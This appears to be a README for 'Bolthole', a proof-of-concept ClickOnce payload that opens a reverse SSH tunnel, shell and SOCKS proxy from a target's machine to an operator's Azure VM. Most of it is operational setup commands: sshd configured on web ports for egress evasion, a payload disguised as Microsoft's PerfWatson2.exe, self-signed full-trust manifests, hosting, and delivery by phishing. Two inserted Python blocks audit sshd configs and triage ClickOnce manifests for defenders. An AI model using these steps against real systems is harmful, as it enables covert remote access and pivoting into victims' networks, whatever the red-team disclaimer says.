A proof-of-concept ClickOnce payload for Red Teams to establish initial access in authorized penetration tests.
Bolthole provides operators with:
- Reverse SSH tunnel into the target environment
- CMD shell access as the executing user (no password required)
- SOCKS proxy functionality for pivoting
- Create an Azure VM (Ubuntu recommended)
- Configure the sshd_config file: sudo nano /etc/ssh/sshd_config
  Add/modify these lines:
    Port 22
    Port 80
    Port 443
    Port 31337
    AllowTcpForwarding yes
    GatewayPorts yes
    PermitRootLogin no
    PasswordAuthentication no
    PubkeyAuthentication yes
- Restart the SSH service: sudo systemctl restart sshd
- Create a user with nologin: sudo useradd -m -s /usr/sbin/nologin clientnameuser
- Create an SSH keypair for the target to connect back with: ssh-keygen -t rsa -b 4096 -f clientnameuser_key -N ""
- Add the public key to authorized_keys: nano /home/clientnameuser/.ssh/authorized_keys
- Change ownership: sudo chown -R clientnameuser:clientnameuser /home/clientnameuser/
- Copy the contents of the clientnameuser_key private key to WebDeploy\Install\BoltFiles\clientnameuser_key
- Modify the Azure VM firewall in the networking settings of the VM to allow inbound traffic on the ports you chose for SSH.
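As an added defensive check (illustration code, not part of Bolthole), the following Python audits an sshd_config for the directives the steps above set. The sample configuration is constructed from those directives plus a Match block; the audit flags the forwarding settings that make a host usable as a tunnel endpoint, notes sshd listening on ports other than 22, and confirms that password and root logins are off. Keyword defaults follow the OpenSSH sshd_config man page.

```python
"""Audit an sshd_config for the forwarding and authentication directives that a
reverse-tunnel endpoint depends on. Added illustration, not Bolthole code."""
from __future__ import annotations

# Constructed sample: the directives from the setup steps, plus a Match block to
# show that only the global section (before the first Match) is audited.
SAMPLE_SSHD_CONFIG = """\
# constructed sample, not a real host's configuration
Port 22
Port 80
Port 443
Port 31337
AllowTcpForwarding yes
GatewayPorts yes
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Match User clientnameuser
    AllowTcpForwarding yes
"""

# OpenSSH defaults for the keywords audited here
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}
STANDARD_SSH_PORT = 22


def parse_sshd_config(text: str) -> dict:
    """Split a config into listening ports, global options and Match blocks.
    sshd honours the first occurrence of a keyword, so setdefault() keeps it."""
    ports: list[int] = []
    global_opts: dict[str, str] = {}
    match_blocks: list[dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) == 2 else ""
        if key == "match":
            current = {"criteria": parts[1].strip(), "options": {}}
            match_blocks.append(current)
        elif current is not None:
            current["options"].setdefault(key, value)
        elif key == "port":
            ports.append(int(value))
        else:
            global_opts.setdefault(key, value)
    return {"ports": ports, "global": global_opts, "match_blocks": match_blocks}


def audit_sshd_config(text: str) -> list[tuple[str, str]]:
    """Return (code, explanation) findings for the global section of a config."""
    cfg = parse_sshd_config(text)
    opts = {**DEFAULTS, **cfg["global"]}
    findings: list[tuple[str, str]] = []
    if opts["allowtcpforwarding"] != "no":
        findings.append(("TCP_FORWARDING",
                         "AllowTcpForwarding is on: authenticated clients can open reverse tunnels (ssh -R)"))
    if opts["gatewayports"] in ("yes", "clientspecified"):
        findings.append(("GATEWAY_PORTS",
                         "GatewayPorts lets remote-forwarded ports bind on all interfaces, not only loopback"))
    if opts["passwordauthentication"] == "yes":
        findings.append(("PASSWORD_AUTH", "password logins are accepted"))
    if opts["permitrootlogin"] == "yes":
        findings.append(("ROOT_LOGIN", "interactive root login is permitted"))
    extra_ports = [p for p in cfg["ports"] if p != STANDARD_SSH_PORT]
    if extra_ports:
        findings.append(("NONSTANDARD_PORT",
                         f"sshd also listens on {extra_ports}; 80/443 make SSH look like web traffic to egress filters"))
    return findings


if __name__ == "__main__":
    for code, why in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"{code:17} {why}")
```

Run against the sample, the audit reports TCP_FORWARDING, GATEWAY_PORTS and NONSTANDARD_PORT and nothing about authentication, which is exactly the profile of a host configured as a tunnel endpoint rather than an ordinary server; an empty config (pure defaults) reports TCP_FORWARDING and PASSWORD_AUTH instead.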
- Update connection settings in the project to use your Azure VM's FQDN
- Change any ports you desire
- Modify the authorized_keys file to include your public key (generate one with ssh-keygen -t ecdsa -N "")
- Copy PerfWatson2.exe (from c:\program files\Microsoft Visual Studio\2022\Community\Common7\IDE\PerfWatson2.exe) to the WebDeploy\Install folder.
- Open Tools -> Command Line -> Developer PowerShell
- From the Bolthole directory, make the pvk: makecert.exe -sv ClickOnce.pvk -n "cn=ClickOnce" ClickOnce.cer -b 01/01/2025 -e 01/01/2026 -r
- Convert to pfx: pvk2pfx.exe -pvk ClickOnce.pvk -spc ClickOnce.cer -pfx ClickOnce.pfx
- Create Installer manifest from the WebDeploy\Install directory: mage.exe -New Application -Processor amd64 -ToFile .\Installer.exe.manifest -Name PerfWatson2 -Version 17.0.33711.286 -TrustLevel FullTrust -FromDirectory .
- Sign the manifest: mage.exe -Sign .\Installer.exe.manifest -CertFile ..\..\ClickOnce.pfx
- Create the application: mage.exe -New Deployment -Processor amd64 -Install false -Publisher "Digital Signatures" -AppManifest Installer.exe.manifest -ToFile Installer.application -ProviderUrl https://.azurewebsites.net/Install/Installer.application
- Sign the application: mage.exe -Sign .\Installer.application -CertFile ..\..\ClickOnce.pfx
- Host the ClickOnce package on a web server
- Sign in using Azure CLI: az login --use-device-code
- From the WebDeploy directory: az webapp up --location eastus2 --resource-group --name --html --sku F1
- Provide the link to the target (via phishing or other authorized methods)
- When executed, it will establish the reverse SSH tunnel
- Connect to your Azure VM
- Access the target machine through the established tunnel (default port 31332):
ssh -p [TUNNEL_PORT] [USERNAME]@localhost
- For SOCKS proxy:
ssh -D 1080 -p [TUNNEL_PORT] [USERNAME]@localhost
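For responders who receive such a link, the following added Python (illustration code, not part of Bolthole) shows what the two manifests built above reveal before anything runs: the publisher string, the provider URL, whether the deployment is online-only (install=false), the entry-point executable, and whether the application manifest requests full trust. Both manifests are constructed samples whose layout is assumed to follow what mage.exe -New Deployment and -New Application emit; the hostname and publicKeyToken are placeholders.

```python
"""Triage a ClickOnce deployment (.application) manifest and the application
(.exe.manifest) it references. Added illustration, not Bolthole code."""
import xml.etree.ElementTree as ET

# Constructed sample deployment manifest (assumed mage.exe layout; placeholder host/token).
DEPLOYMENT_MANIFEST = """\
<asmv1:assembly manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2">
  <assemblyIdentity name="Installer.application" version="17.0.33711.286"
      publicKeyToken="0000000000000000" language="neutral" processorArchitecture="amd64" />
  <description asmv2:publisher="Digital Signatures" asmv2:product="PerfWatson2" />
  <deployment install="false">
    <deploymentProvider codebase="https://EXAMPLE-APP.azurewebsites.net/Install/Installer.application" />
  </deployment>
  <dependency>
    <dependentAssembly dependencyType="install" codebase="Installer.exe.manifest" size="1">
      <assemblyIdentity name="PerfWatson2" version="17.0.33711.286" type="win32" />
    </dependentAssembly>
  </dependency>
</asmv1:assembly>
"""

# Constructed sample application manifest requesting full trust (-TrustLevel FullTrust).
APPLICATION_MANIFEST = """\
<asmv1:assembly manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="urn:schemas-microsoft-com:asm.v2">
  <assemblyIdentity name="PerfWatson2" version="17.0.33711.286" type="win32" />
  <entryPoint>
    <commandLine file="PerfWatson2.exe" parameters="" />
  </entryPoint>
  <trustInfo>
    <security>
      <applicationRequestMinimum>
        <PermissionSet Unrestricted="true" ID="Custom" SameSite="site" />
        <defaultAssemblyRequest permissionSetReference="Custom" />
      </applicationRequestMinimum>
    </security>
  </trustInfo>
</asmv1:assembly>
"""


def _local(name: str) -> str:
    """Strip the XML namespace from a tag or attribute name."""
    return name.rsplit("}", 1)[-1]


def _first(root, tag: str):
    """First element in document order whose local tag name matches."""
    return next((el for el in root.iter() if _local(el.tag) == tag), None)


def _attr(el, name: str, default=None):
    """Namespace-agnostic attribute lookup; tolerates a missing element."""
    if el is None:
        return default
    return next((v for k, v in el.attrib.items() if _local(k) == name), default)


def triage_deployment(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    desc = _first(root, "description")
    return {
        "name": _attr(_first(root, "assemblyIdentity"), "name"),
        "publisher": _attr(desc, "publisher"),
        "product": _attr(desc, "product"),
        # install="false": online-only app, launched from the URL each time, never installed
        "online_only": _attr(_first(root, "deployment"), "install", "true").lower() == "false",
        "provider_url": _attr(_first(root, "deploymentProvider"), "codebase"),
        "app_manifest": _attr(_first(root, "dependentAssembly"), "codebase"),
    }


def triage_application(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    perm = _first(root, "PermissionSet")
    return {
        "entry_point": _attr(_first(root, "commandLine"), "file"),
        # Unrestricted="true" is the full-trust request; the app runs with the user's rights
        "full_trust": _attr(perm, "Unrestricted", "false").lower() == "true",
    }


def triage_flags(deployment: dict, application: dict) -> list[str]:
    flags = []
    if application["full_trust"]:
        flags.append("FULL_TRUST")
    if deployment["online_only"]:
        flags.append("ONLINE_ONLY")
    if not (deployment["provider_url"] or "").lower().startswith("https://"):
        flags.append("NON_HTTPS_PROVIDER")
    return flags


if __name__ == "__main__":
    dep = triage_deployment(DEPLOYMENT_MANIFEST)
    app = triage_application(APPLICATION_MANIFEST)
    print(dep, app, triage_flags(dep, app))
```

The publisher and product strings are free text chosen at build time, so they carry no trust on their own; what matters for triage is who signed the manifest, where deploymentProvider points, and that a full-trust, online-only deployment will run whatever the entry-point executable does under the clicking user's account.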
This tool is provided for authorized Red Team operations only. Usage against systems without explicit permission is illegal.